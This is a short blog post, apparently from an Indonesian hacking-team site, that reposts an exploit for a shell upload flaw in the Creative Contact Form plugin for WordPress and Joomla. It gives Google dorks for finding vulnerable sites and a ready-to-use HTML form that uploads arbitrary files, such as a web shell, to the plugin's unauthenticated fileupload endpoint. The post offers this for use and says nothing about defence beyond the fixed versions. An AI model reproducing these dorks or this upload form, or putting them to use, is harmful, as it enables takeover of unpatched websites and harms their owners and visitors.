Creative Contact Form Shell Upload Vulnerability ( Joomla & Wordpress )


#- Title: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
                  Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
                               creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (wordpress )
                           inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================

-- Proof Of Concept --
When Vuln : {"files":
CSRF : 
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"enctype="multipart/form-data"><input type="file" name="files[]" /><button>Upload</button></form>
Shell Path : Here
 

3xploi7 Team

0 Response to "Creative Contact Form Shell Upload Vulnerability ( Joomla & Wordpress )"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel


Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya

Simak Update Artikel menarik disini, Stay toon !! 3xploi7.com
Jangan sampai Terlewatkan.
 • Join Grup Team : 

 • Update Konten Unik Lainnya di : 
 Instagram
— Twitter

 • Tonton video kami di : 

 Youtube